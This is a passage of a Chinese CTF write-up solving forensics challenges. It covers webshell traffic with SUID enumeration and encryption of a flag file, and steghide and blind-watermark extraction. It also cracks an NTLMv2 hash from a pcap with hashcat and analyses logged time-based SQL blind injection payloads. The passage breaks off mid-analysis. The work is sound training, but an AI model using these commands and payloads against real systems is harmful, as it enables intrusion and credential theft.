140
root         304  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_21]
141
root         305  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_21]
142
root         306  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_22]
143
root         307  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_22]
144
root         308  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_23]
145
root         309  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_23]
146
root         310  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_24]
147
root         311  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_24]
148
root         312  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_25]
149
root         313  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_25]
150
root         314  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_26]
151
root         315  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_26]
152
root         316  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_27]
153
root         317  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_27]
154
root         318  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_28]
155
root         319  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_28]
156
root         320  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_29]
157
root         321  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_29]
158
root         322  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_30]
159
root         323  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_30]
160
root         324  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_31]
161
root         325  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_31]
162
root         352  0.0  0.0      0     0 ?        S    09:13   0:00 [scsi_eh_32]
163
root         353  0.0  0.0      0     0 ?        I<   09:13   0:00 [scsi_tmf_32]
164
root         370  0.0  0.0      0     0 ?        I<   09:13   0:00 [kdmflush]
165
root         400  0.0  0.0      0     0 ?        I<   09:13   0:00 [raid5wq]
166
root         448  0.0  0.0      0     0 ?        S    09:13   0:00 [jbd2/dm-0-8]
167
root         449  0.0  0.0      0     0 ?        I<   09:13   0:00 [ext4-rsv-conver]
168
root         525  0.0  0.4  64268 18632 ?        S<s  09:13   0:00 /lib/systemd/systemd-journald
169
root         554  0.0  0.0      0     0 ?        I<   09:13   0:00 [kaluad]
170
root         557  0.0  0.1  26036  6892 ?        Ss   09:13   0:00 /lib/systemd/systemd-udevd
171
root         558  0.0  0.0      0     0 ?        I<   09:13   0:00 [kmpath_rdacd]
172
root         559  0.0  0.0      0     0 ?        I<   09:13   0:00 [kmpathd]
173
root         560  0.0  0.0      0     0 ?        I<   09:13   0:00 [kmpath_handlerd]
174
root         561  0.0  0.6 354884 27096 ?        SLsl 09:13   0:04 /sbin/multipathd -d -s
175
root         693  0.0  0.0      0     0 ?        S    09:13   0:00 [jbd2/sda2-8]
176
root         694  0.0  0.0      0     0 ?        I<   09:13   0:00 [ext4-rsv-conver]
177
systemd+     711  0.0  0.1  89364  6624 ?        Ssl  09:13   0:00 /lib/systemd/systemd-timesyncd
178
root         740  0.0  0.3  51152 12060 ?        Ss   09:13   0:00 /usr/bin/VGAuthService
179
root         741  0.3  0.2 314820  9360 ?        Ssl  09:13   0:51 /usr/bin/vmtoolsd
180
systemd+     846  0.0  0.3  26332 13300 ?        Ss   09:13   0:00 /lib/systemd/systemd-resolved
181
root         857  0.0  0.0   6896  3088 ?        Ss   09:13   0:00 /usr/sbin/cron -f -P
182
message+     858  0.0  0.1   8872  5060 ?        Ss   09:13   0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
183
root         864  0.0  0.1  82832  3992 ?        Ssl  09:13   0:00 /usr/sbin/irqbalance --foreground
184
root         865  0.0  0.4  32820 19588 ?        Ss   09:13   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
185
root         866  0.0  0.1 234504  6636 ?        Ssl  09:13   0:00 /usr/libexec/polkitd --no-debug
186
syslog       867  0.0  0.1 222404  6244 ?        Ssl  09:13   0:00 /usr/sbin/rsyslogd -n -iNONE
187
root         871  0.0  0.8 1321412 32464 ?       Ssl  09:13   0:02 /usr/lib/snapd/snapd
188
root         873  0.0  0.1  15536  7212 ?        Ss   09:13   0:00 /lib/systemd/systemd-logind
189
root         875  0.0  0.3 392628 12828 ?        Ssl  09:13   0:00 /usr/libexec/udisks2/udisksd
190
root         897  0.0  0.1   7852  4828 tty1     Ss   09:13   0:00 /bin/login -p --
191
root         908  0.0  0.3 317968 12416 ?        Ssl  09:13   0:00 /usr/sbin/ModemManager
192
root         919  0.0  0.2  15440  9364 ?        Ss   09:13   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
193
root         930  0.0  0.5 109788 21716 ?        Ssl  09:13   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
194
root        1071  0.0  1.8 1972468 71704 ?       Ssl  09:13   0:04 dockerd --group docker --exec-root=/run/snap.docker --data-root=/var/snap/docker/common/var-lib-docker --pidfile=/run/snap.docker/docker.pid --config-file=/var/snap/docker/3265/config/daemon.json
195
root        1435  0.3  1.1 1802020 44404 ?       Ssl  09:13   0:43 containerd --config /run/snap.docker/containerd/containerd.toml
196
c3ngh       4070  0.0  0.2  17080  9532 ?        Ss   10:04   0:00 /lib/systemd/systemd --user
197
c3ngh       4071  0.0  0.0 169388  3856 ?        S    10:04   0:00 (sd-pam)
198
c3ngh       4078  0.0  0.1   8744  5504 tty1     S+   10:04   0:00 -bash
199
systemd+    6216  0.0  0.1  16256  7924 ?        Ss   10:36   0:00 /lib/systemd/systemd-networkd
200
root        6586  6.0  1.5 2368452 60300 ?       Ssl  10:39   8:25 /xp/panel/app
201
root        6587  0.0  0.1 578348  7272 ?        Ssl  10:39   0:00 /xp/tasks/xp-tasks
202
root        6665  0.0  0.7 168680 28084 ?        Ss   10:40   0:02 /xp/server/apache/bin/httpd -k start
203
root        6848  0.0  0.2 193112  9928 ?        Ss   10:40   0:01 php-fpm: master process (/xp/server/php/php-7.4/etc/php-fpm.conf)
204
www         6849  0.0  0.5 193544 21528 ?        S    10:40   0:00 php-fpm: pool www
205
www         6850  0.0  0.5 193544 21224 ?        S    10:40   0:00 php-fpm: pool www
206
www         9492  0.1  0.2 1587116 11088 ?       Sl   11:02   0:12 /xp/server/apache/bin/httpd -k start
207
www         9493  0.2  0.2 1718268 11820 ?       Sl   11:02   0:14 /xp/server/apache/bin/httpd -k start
208
www         9494  0.1  0.2 1587116 11532 ?       Sl   11:02   0:12 /xp/server/apache/bin/httpd -k start
209
www         9856  0.1  0.2 1587116 10724 ?       Sl   11:06   0:11 /xp/server/apache/bin/httpd -k start
210
root       10417  0.0  1.0 475504 42540 ?        Ssl  11:17   0:02 /usr/libexec/fwupd/fwupd
211
root       10418  0.4  0.0      0     0 ?        I    11:17   0:25 [kworker/0:1-events]
212
root       10444  0.0  0.2 239628  8660 ?        Ssl  11:18   0:00 /usr/libexec/upowerd
213
root       10470  0.0  0.0  81388   856 ?        Ss   11:18   0:00 gpg-agent --homedir /var/lib/fwupd/gnupg --use-standard-socket --daemon
214
root       10935  0.0  0.0      0     0 ?        I    11:31   0:01 [kworker/u256:2-events_power_efficient]
215
root       12409  0.2  0.0      0     0 ?        I    12:05   0:09 [kworker/1:0-events]
216
root       12410  0.0  0.0      0     0 ?        I    12:05   0:00 [kworker/0:0-events]
217
root       13233  0.0  0.0      0     0 ?        I    12:30   0:00 [kworker/u256:0-events_power_efficient]
218
root       13818  0.0  0.0      0     0 ?        I    12:48   0:00 [kworker/1:1]
219
root       13820  0.0  0.0      0     0 ?        I    12:48   0:00 [kworker/u256:3-events_power_efficient]
220
www        14312  0.0  0.0   7316  3444 ?        R    12:58   0:00 ps -aux

~~过于墨迹了~~

shell(18).php

1
cd /xp/www/week2/uploads/ ;ls /
2

3
bin
4
boot
5
cdrom
6
dev
7
etc
8
flag
9
home
10
lib
11
lib32
12
lib64
13
libx32
14
lost+found
15
media
16
mnt
17
opt
18
proc
19
root
20
run
21
sbin
22
snap
23
srv
24
sys
25
tmp
26
usr
27
var
28
xp

shell(21).php

1
cd /xp/www/week2/uploads/ ;cd /

shell(24).php

1
$cmd="Y2QgLyA7ZmluZCAvIC1wZXJtIC00MDAwIC10eXBlIGYgMj4vZGV2L251bGw=";
2
$cmd=base64_decode($cmd);
3
$path="Lw==";
4
$path=base64_decode($path);
5
main($cmd,$path);

1
cd / ;find / -perm -4000 -type f 2>/dev/null
2

3
/snap/snapd/21759/usr/lib/snapd/snap-confine
4
/snap/core20/2318/usr/bin/chfn
5
/snap/core20/2318/usr/bin/chsh
6
/snap/core20/2318/usr/bin/gpasswd
7
/snap/core20/2318/usr/bin/mount
8
/snap/core20/2318/usr/bin/newgrp
9
/snap/core20/2318/usr/bin/passwd
10
/snap/core20/2318/usr/bin/su
11
/snap/core20/2318/usr/bin/sudo
12
/snap/core20/2318/usr/bin/umount
13
/snap/core20/2318/usr/lib/dbus-1.0/dbus-daemon-launch-helper
14
/snap/core20/2318/usr/lib/openssh/ssh-keysign
15
/snap/core22/2045/usr/bin/chfn
16
/snap/core22/2045/usr/bin/chsh
17
/snap/core22/2045/usr/bin/gpasswd
18
/snap/core22/2045/usr/bin/mount
19
/snap/core22/2045/usr/bin/newgrp
20
/snap/core22/2045/usr/bin/passwd
21
/snap/core22/2045/usr/bin/su
22
/snap/core22/2045/usr/bin/sudo
23
/snap/core22/2045/usr/bin/umount
24
/snap/core22/2045/usr/lib/dbus-1.0/dbus-daemon-launch-helper
25
/snap/core22/2045/usr/lib/openssh/ssh-keysign
26
/snap/core22/2045/usr/libexec/polkit-agent-helper-1
27
/usr/bin/mount
28
/usr/bin/sudo
29
/usr/bin/openssl
30
/usr/bin/su
31
/usr/bin/fusermount3
32
/usr/bin/passwd
33
/usr/bin/chfn
34
/usr/bin/gpasswd
35
/usr/bin/umount
36
/usr/bin/newgrp
37
/usr/bin/pkexec
38
/usr/bin/chsh
39
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
40
/usr/lib/snapd/snap-confine
41
/usr/lib/openssh/ssh-keysign
42
/usr/libexec/polkit-agent-helper-1

看到snap天生应激%%。看样子是想SUID提权了（并没有）。

shell(27).php

1
cd / ;openssl enc -des3 -salt -k W3lc0me2m1sc -in /flag -out /xp/www/week2/uploads/flag_decrypted.zip

他喵的早知道从后往前看了。。。

本地执行：

1
openssl enc -d -des3 -k W3lc0me2m1sc -in flag_decrypted.zip -out flag.zip

1
(base) ➜  [Week2] 布豪有黑客(二) unzip flag.zip
2
Archive:  flag.zip
3
  End-of-central-directory signature not found.  Either this file is not
4
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
5
  latter case the central directory and zipfile comment will be found on
6
  the last disk(s) of this archive.
7
unzip:  cannot find zipfile directory in one of flag.zip or
8
        flag.zip.zip, and cannot find flag.zip.ZIP, period.

嗯????

1
(base) ➜  [Week2] 布豪有黑客(二) file flag.zip
2
flag.zip: ASCII text, with no line terminators
3
(base) ➜  [Week2] 布豪有黑客(二) cat flag.zip
4
flag{1z_Beh1nd3r_Web5he1L_Ne7w0rk_Tr4ff1c}%

嗷嗷～～

[Week2] 破碎的拼图#

查看hint，得知使用了steghide，~~macOS妹有啊，使用orb，我Chao！Arch Linux也妹有，好吧得blackarch~~。我超！我Orb炸了，他喵的出师不利。

1
steghide extract -sf image.jpg -p ?CTF

获得flag_A.z02 flag_B.z01 flag_C.zip，统一重命名为 flag_A.z02 flag_A.z01 flag_A.zip，点击zip解压，获得flag.doc。

1
flag{br0k3n_p1eces_r3a553mb13d_7h3_puzz13}

[Week2] 文化木的侦探委托(二)#

文化木在解出了图片里的求助信号后，她的电脑突然开始自己动了起来，并又下载得到了一张图片，同时电脑上出现了两行字。【表面无异，隐形涟漪里藏着求助的回声。】【捕捉波纹，对比参差，真相会回应你。】（注：flag内为可识别的明文，仅首个单词的首字母大写，以flag{}包裹）

用010Editor打开，发现：

1
tEXtComment�Eh, you actually managed to find this place... Then let me give you a little more hint. If you truly understand the structure of a PNG file, do you know what a blind watermark is?

010Editor发现chunk[104]大小<200CH，chunk[105]>200CH，推测尾部附带了一张照片。

1
#!/usr/bin/env python3
2
# Usage:
3
#   python3 rebuild_png_from_idat.py original.png idat_104.bin out.png
4
#
5
# It extracts IHDR from original.png and builds a new PNG containing:
6
#   PNG signature + IHDR (from original) + single IDAT (data from idat file) + IEND
7
#
8
# Note: this assumes the idat_104.bin you have is exactly the IDAT "data" field (raw zlib bytes),
9
#       i.e. what you'd get by extracting chunk data (not including length/type/crc).
10

11
import sys, struct, zlib, os
12

13
def read_chunks(fn):
14
    b = open(fn,'rb').read()
15
    if not b.startswith(b'\x89PNG\r\n\x1a\n'):
16
        raise SystemExit("Not a PNG: " + fn)
17
    pos = 8
18
    chunks = []
19
    while pos + 8 <= len(b):
20
        length = struct.unpack(">I", b[pos:pos+4])[0]
21
        ctype = b[pos+4:pos+8]
22
        data = b[pos+8:pos+8+length]
23
        crc = struct.unpack(">I", b[pos+8+length:pos+8+length+4])[0] if pos+8+length+4 <= len(b) else None
24
        chunks.append((pos, length, ctype, data, crc))
25
        pos = pos + 8 + length + 4
26
        if ctype == b'IEND':
27
            break
28
    return chunks
29

30
def extract_ihdr(original_png):
31
    chunks = read_chunks(original_png)
32
    for (pos,length,ctype,data,crc) in chunks:
33
        if ctype == b'IHDR':
34
            if length != 13:
35
                raise SystemExit("IHDR length unexpected: %d" % length)
36
            return data
37
    raise SystemExit("IHDR chunk not found in " + original_png)
38

39
def write_chunk(f, ctype, data):
40
    f.write(struct.pack(">I", len(data)))
41
    f.write(ctype)
42
    f.write(data)
43
    crc = zlib.crc32(ctype + data) & 0xffffffff
44
    f.write(struct.pack(">I", crc))
45

46
def rebuild(original_png, idat_bin, out_png):
47
    ihdr = extract_ihdr(original_png)
48
    idat_data = open(idat_bin, 'rb').read()
49

50
    # sanity: ensure idat_data is non-empty
51
    if len(idat_data) == 0:
52
        raise SystemExit("Empty IDAT data file: " + idat_bin)
53

54
    with open(out_png, 'wb') as f:
55
        # PNG signature
56
        f.write(b'\x89PNG\r\n\x1a\n')
57
        # IHDR
58
        write_chunk(f, b'IHDR', ihdr)
59
        # Single IDAT with your data
60
        write_chunk(f, b'IDAT', idat_data)
61
        # IEND
62
        write_chunk(f, b'IEND', b'')
63
    print("Wrote", out_png, " (IHDR from", original_png, ", IDAT from", idat_bin, ")")
64

65
if __name__ == "__main__":
66
    if len(sys.argv) != 4:
67
        print("Usage: python3 rebuild_png_from_idat.py original.png idat_104.bin out.png")
68
        sys.exit(1)
69
    original_png = sys.argv[1]
70
    idat_bin = sys.argv[2]
71
    out_png = sys.argv[3]
72
    rebuild(original_png, idat_bin, out_png)

1
python bb.py Blind2.png idat_104.bin out.png

使用https://github.com/chishaxie/BlindWaterMark提取盲水印：

1
(base) ➜  BlindWaterMark git:(master) python bwmforpy3.py decode ../Blind2.png ../out.png aaaaa.png

aaaaa

1
flag{W@tch_underw@ter}

我瞎了

[Week3] 布豪有黑客(三)#

c3的linux服务器暂时安全了…但c3的Windows呢？不仅有弱口令，flag所在的文件夹好像还被共享了…？

参考https://goodlunatic.github.io/posts/5422d65/#提取-ntlmv2-哈希值并破解smb协议

1
(base) ➜  [Week3] 布豪有黑客(三) python NTLMRawUnHide.py -i 布豪有黑客\(三\).pcapng
2
                                                              /%(                   rockyou.txt
3
                               -= Find NTLMv2 =-          ,@@@@@@@@&e.py            smb.hash
4
           /%&@@@@&,            -= hashes w/ =-          %@@@@@@@@@@@*
5
         (@@@@@@@@@@@(       -= NTLMRawUnHide.py =-    *@@@@@@@@@@@@@@@.
6
        &@@@@@@@@@@@@@@&.                             @@@@@@@@@@@@@@@@@@(
7
      ,@@@@@@@@@@@@@@@@@@@/                        .%@@@@@@@@@@@@@@@@@@@@@
8
     /@@@@@@@#&@&*.,/@@@@(.                            ,%@@@@&##(%@@@@@@@@@.
9
    (@@@@@@@(##(.         .#&@%%(                .&&@@&(            ,/@@@@@@#
10
   %@@@@@@&*/((.         #(                           ,(@&            ,%@@@@@@*
11
  @@@@@@@&,/(*                                           ,             .,&@@@@@#
12
 @@@@@@@/*//,                                                            .,,,**
13
   .,,  ...
14
                                    .#@@@@@@@(.
15
                                   /@@@@@@@@@@@&
16
                                   .@@@@@@@@@@@*
17
                                     .(&@@@%/.  ..
18
                               (@@&     %@@.   .@@@,
19
                          /@@#          @@@,         %@&
20
                               &@@&.    @@@/    @@@#
21
                          .    %@@@(   ,@@@#    @@@(     ,
22
                         *@@/         .@@@@@(          #@%
23
                          *@@%.      &@@@@@@@@,      /@@@.
24
                           .@@@@@@@@@@@&. .*@@@@@@@@@@@/.
25
                              .%@@@@%,        /%@@@&(.
26

27

28
Searching 布豪有黑客(三).pcapng for NTLMv2 hashes...
29

30
Found NTLMSSP Message Type 1 : Negotiation
31

32
Found NTLMSSP Message Type 2 : Challenge
33
    > Server Challenge       : 91e15fed933eff0c
34

35
Found NTLMSSP Message Type 3 : Authentication
36
    > Domain                 : C3NGH--DESKTOP
37
    > Username               : rockyou
38
    > Workstation            : C3NGH--DESKTOP
39

40
NTLMv2 Hash recovered:
41
rockyou::C3NGH--DESKTOP:91e15fed933eff0c:e20402e8a924e2de7c1e3fd3f949bc38:01010000000000001df551630839dc011473b30c1fc1c20f000000000200160046004c00410047002d005300450052005600450052000100160046004c00410047002d005300450052005600450052000400160046004c00410047002d005300650072007600650072000300160046004c00410047002d00530065007200760065007200070008001df551630839dc0106000400020000000800300030000000000000000100000000200000a6cd8042becda35cc7967ee26857127fac305123020cefe31fcefbfd7ece32d50a001000000000000000000000000000000000000900200063006900660073002f0046004c00410047002d00530045005200560045005200000000000000000000000000
42

43
(base) ➜  [Week3] 布豪有黑客(三) vim hash.txt
44
(base) ➜  [Week3] 布豪有黑客(三) hashcat -m 5600 hash.txt rockyou.txt
45
hashcat (v7.1.2) starting
46

47
METAL API (Metal 370.63.1)ss. Please be patient....
48
==========================
49
* Device #01: Apple M4 Pro, skipped
50

51
OpenCL API (OpenCL 1.2 (Aug  2 2025 21:16:03)) - Platform #1 [Apple]
52
====================================================================
53
* Device #02: Apple M4 Pro, GPU, 19169/38338 MB (3594 MB allocatable), 16MCU
54

55
Minimum password length supported by kernel: 0
56
Maximum password length supported by kernel: 256
57
Minimum salt length supported by kernel: 0
58
Maximum salt length supported by kernel: 256
59

60
Hashes: 1 digests; 1 unique digests, 1 unique saltstient...
61
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
62
Rules: 1
63

64
Optimizers applied:
65
* Zero-Byte
66
* Not-Iterated
67
* Single-Hash
68
* Single-Salt
69

70
ATTENTION! Pure (unoptimized) backend kernels selected.
71
Pure kernels can crack longer passwords, but drastically reduce performance.
72
If you want to switch to optimized kernels, append -O to your commandline.
73
See the above message to find out about the exact limits.
74

75
Watchdog: Temperature abort trigger set to 100c
76

77
Host memory allocated for this attack: 793 MB (18087 MB free)...
78

79
Dictionary cache hit:lease be patient...
80
* Filename..: rockyou.txt
81
* Passwords.: 14344384
82
* Bytes.....: 139921497
83
* Keyspace..: 14344384
84

85
ROCKYOU::C3NGH--DESKTOP:91e15fed933eff0c:e20402e8a924e2de7c1e3fd3f949bc38:01010000000000001df551630839dc011473b30c1fc1c20f000000000200160046004c00410047002d005300450052005600450052000100160046004c00410047002d005300450052005600450052000400160046004c00410047002d005300650072007600650072000300160046004c00410047002d00530065007200760065007200070008001df551630839dc0106000400020000000800300030000000000000000100000000200000a6cd8042becda35cc7967ee26857127fac305123020cefe31fcefbfd7ece32d50a001000000000000000000000000000000000000900200063006900660073002f0046004c00410047002d00530045005200560045005200000000000000000000000000:poohkitty13
86

87
Session..........: hashcat
88
Status...........: Cracked
89
Hash.Mode........: 5600 (NetNTLMv2)
90
Hash.Target......: ROCKYOU::C3NGH--DESKTOP:91e15fed933eff0c:e20402e8a9...000000
91
Time.Started.....: Sat Oct 11 18:48:31 2025 (0 secs)
92
Time.Estimated...: Sat Oct 11 18:48:31 2025 (0 secs)
93
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
94
Guess.Base.......: File (rockyou.txt)
95
Guess.Queue......: 1/1 (100.00%)
96
Speed.#02........: 27172.5 kH/s (0.16ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
97
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
98
Progress.........: 5242880/14344384 (36.55%)
99
Rejected.........: 0/5242880 (0.00%)
100
Restore.Point....: 4194304/14344384 (29.24%)
101
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
102
Candidate.Engine.: Device Generator
103
Candidates.#02...: roganoan -> n1ckos
104
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
105
Hardware.Mon.#02.: Util: 59% Pwr:1219mW
106

107
Started: Sat Oct 11 18:48:30 2025
108
Stopped: Sat Oct 11 18:48:32 2025

密码为poohkitty13

wireshark1 wireshark2

好，导出flag.txt

1
flag{D0_U_L1k3_1z_NTLMv2_4nd_r0ckYouuuuu~}

总结：这题做的时候并不顺利，那个hash.txt搞了半天，果然工具得好。

[Week3] 文化木的侦探委托(三)#

1
(base) ➜  [Week3] 文化木的侦探委托(三) cp 175248_损坏了的压缩包.zip damaged.zip
2
(base) ➜  [Week3] 文化木的侦探委托(三) file damaged.zip
3
damaged.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
4
(base) ➜  [Week3] 文化木的侦探委托(三) unzip -v damaged.zip
5
Archive:  damaged.zip
6
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
7
--------  ------  ------- ---- ---------- ----- --------  ----
8
   13643  Stored    10928  20% 10-06-2025 01:03 3559b49a
9
--------          -------  ---                            -------
10
   13643            10928  20%                            1 file
11

12
note:  didn't find end-of-central-dir signature at end of central dir.
13
(base) ➜  [Week3] 文化木的侦探委托(三) unzip damaged.zip
14
Archive:  damaged.zip
15
:  mismatching "local" filename (flag.docx),
16
         continuing with "central" filename version
17
mapname:  conversion of  failed
18

19
note:  didn't find end-of-central-dir signature at end of central dir.
20
  (please check that you have transferred or created the zipfile in the
21
  appropriate BINARY mode and that you have compiled UnZip properly)
22
(base) ➜  [Week3] 文化木的侦探委托(三) zip -FF damaged.zip --out repaired.zip
23
Fix archive (-FF) - salvage what can
24
 Found end record (EOCDR) - says expect single disk archive
25
Scanning for entries...
26
 copying: flag.docx  (10928 bytes)
27
Central Directory found...
28
no local entry:
29
EOCDR found ( 1  11058)...
30
(base) ➜  [Week3] 文化木的侦探委托(三) ls
31
175248_损坏了的压缩包.zip        damaged.zip                      repaired.zip

[Week4] 布豪有黑客(四)#

Time-based SQL Blind Injection

1
import re
2
from datetime import datetime
3

4
def find_slow_sql_queries(log_filepath, delay_threshold_seconds=2):
5
    """
6
    分析日志文件，找出响应时间超过阈值的SQL查询（慢响应）。
7

8
    Args:
9
        log_filepath (str): access.log文件的路径。
10
        delay_threshold_seconds (int): 定义慢响应的秒数阈值。
11
    """
12
    # 正则表达式用于匹配包含时间戳和SQL查询的行
13
    # 只关心包含RANDOMBLOB的攻击payload
14
    log_pattern = re.compile(
15
        r"\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\]"  # 匹配 [YYYY-MM-DD HH:MM:SS]
16
        r".*?Query: (SELECT.*?RANDOMBLOB.*)"        # 匹配 "Query: SELECT...RANDOMBLOB..."
17
    )
18

19
    parsed_queries = []
20
    print(f"[*] 正在读取日志文件: {log_filepath}")
21

22
    try:
23
        with open(log_filepath, 'r', encoding='utf-8') as f:
24
            for line in f:
25
                match = log_pattern.search(line)
26
                if match:
27
                    timestamp_str, query = match.groups()
28
                    timestamp = datetime.strptime(timestamp_str, "%Y-%m-%d %H:%M:%S")
29
                    parsed_queries.append({
30
                        "timestamp": timestamp,
31
                        "query": query.strip().rstrip('|').strip()
32
                    })
33
    except FileNotFoundError:
34
        print(f"[!] 错误: 文件 '{log_filepath}' 未找到。")
35
        return
36
    except Exception as e:
37
        print(f"[!] 读取或解析文件时发生错误: {e}")
38
        return
39

40
    print(f"[*] 共找到 {len(parsed_queries)} 条攻击查询。")
41
    print(f"[*] 正在分析延迟超过 {delay_threshold_seconds} 秒的慢响应...\n")
42
    print("-" * 50)
43

44
    slow_response_count = 0
45
    # 比较连续查询的时间戳，找出慢响应
46
    for i in range(len(parsed_queries) - 1):
47
        current_log = parsed_queries[i]
48
        next_log = parsed_queries[i+1]
49

50
        # 计算两个查询之间的时间差
51
        time_difference = (next_log["timestamp"] - current_log["timestamp"]).total_seconds()
52

53
        # 如果时间差大于等于阈值，则为慢响应
54
        if time_difference >= delay_threshold_seconds:
55
            slow_response_count += 1
56
            print(f"[*] 慢响应 #{slow_response_count}")
57
            print(f"    时间: {current_log['timestamp']}")
58
            print(f"    延迟: {time_difference:.0f} 秒")
59
            print(f"    查询: {current_log['query']}\n")
60

61
    print("-" * 50)
62
    print(f"\n[+] 分析完成。共找到 {slow_response_count} 个慢响应。")
63

64

65
if __name__ == "__main__":
66
    # 将日志文件命名为 access.log 并与此脚本放在同一目录下
67
    LOG_FILE = 'access.log'
68
    # 攻击者使用的payload会导致大约2-3秒的延迟，因此阈值设为2
69
    DELAY_THRESHOLD = 2
70
    find_slow_sql_queries(LOG_FILE, DELAY_THRESHOLD)

输出（部分）：

1
[*] 正在读取日志文件: access.log
2
[*] 共找到 211 条攻击查询。
3
[*] 正在分析延迟超过 2 秒的慢响应...
4

5
--------------------------------------------------
6
[*] 慢响应 #1
7
    时间: 2025-10-01 13:42:30
8
    延迟: 3 秒
9
    查询: SELECT * FROM articles WHERE author = 'admin' AND CASE WHEN (SELECT UNICODE(SUBSTR(value, 1, 1)) FROM secrets WHERE key='flag' LIMIT 1) >= 70 THEN LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(50000000)))) ELSE 1 END-- -' | IP: 127.0.0.1 | UA: python-requests/2.32.3
10

11
[*] 慢响应 #2
12
    时间: 2025-10-01 13:42:33
13
    延迟: 2 秒
14
    查询: SELECT * FROM articles WHERE author = 'admin' AND CASE WHEN (SELECT LENGTH(value) FROM secrets WHERE key='flag' LIMIT 1) >= 25 THEN LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(50000000)))) ELSE 1 END-- -' | IP: 127.0.0.1 | UA: python-requests/2.32.3
15

16
[*] 慢响应 #3
17
    时间: 2025-10-01 13:42:35
18
    延迟: 3 秒
19
    查询: SELECT * FROM articles WHERE author = 'admin' AND CASE WHEN (SELECT LENGTH(value) FROM secrets WHERE key='flag' LIMIT 1) >= 31 THEN LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(50000000)))) ELSE 1 END-- -' | IP: 127.0.0.1 | UA: python-requests/2.32.3
20

21
[*] 慢响应 #4
22
    时间: 2025-10-01 13:42:38
23
    延迟: 2 秒
24
    查询: SELECT * FROM articles WHERE author = 'admin' AND CASE WHEN (SELECT UNICODE(SUBSTR(value, 1, 1)) FROM secrets WHERE key='flag' LIMIT 1) >= 79 THEN LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(50000000)))) ELSE 1 END-- -' | IP: 127.0.0.1 | UA: python-requests/2.32.3
25

26
[*] 慢响应 #5
27
    时间: 2025-10-01 13:42:40
28
    延迟: 2 秒
29
    查询: SELECT * FROM articles WHERE author = 'admin' AND CASE WHEN (SELECT UNICODE(SUBSTR(value, 1, 1)) FROM secrets WHERE key='flag' LIMIT 1) >= 91 THEN LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(50000000)))) ELSE 1 END-- -' | IP: 127.0.0.1 | UA: python-requests/2.32.3
30

31
[*] 慢响应 #6
32
    时间: 2025-10-01 13:42:42
33
    延迟: 3 秒
34
    查询: SELECT * FROM articles WHERE author = 'admin' AND CASE WHEN (SELECT UNICODE(SUBSTR(value, 1, 1)) FROM secrets WHERE key='flag' LIMIT 1) >= 97 THEN LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(50000000)))) ELSE 1 END-- -' | IP: 127.0.0.1 | UA: python-requests/2.32.3

把输出丢给Gemini，其实再写个py或者肉眼瞪一下也行，但时间上不划算。

1
我们逐个分析慢响应日志，还原被窃取的数据。攻击者首先探测了flag的长度，然后逐个字符进行猜测。
2
确定Flag长度
3

4
慢响应 #2: (SELECT LENGTH(value) FROM secrets WHERE key='flag' LIMIT 1) >= 25 为 真。
5
慢响应 #3: (SELECT LENGTH(value) FROM secrets WHERE key='flag' LIMIT 1) >= 31 为 真。
6
（日志中没有 ... >= 32 的慢响应，可以推断该查询为假）
7
结论：Flag 的长度为 31 个字符。
8

9
逐字符分析 通过分析每个SUBSTR(value, N, 1)的测试条件，我们可以确定第N个字符的ASCII码或十六进制值。攻击者使用了二分法或类似的搜索算法来快速定位每个字符的值。我们取每个位置最后一个为“真”的条件作为该字符的值。
10

11
字符 1: UNICODE(...) >= 102 为真，... >= 103 为假。ASCII码为 102，即 'f'。
12
字符 2: HEX(...) >= '6C' 为真，... >= '6D' 为假。十六进制为 0x6C，即 'l'。
13
字符 3: UNICODE(...) >= 97 为真，... >= 98 为假。ASCII码为 97，即 'a'。
14
字符 4: ... >= CHAR(103) 为真，... >= CHAR(104) 为假。ASCII码为 103，即 'g'。
15
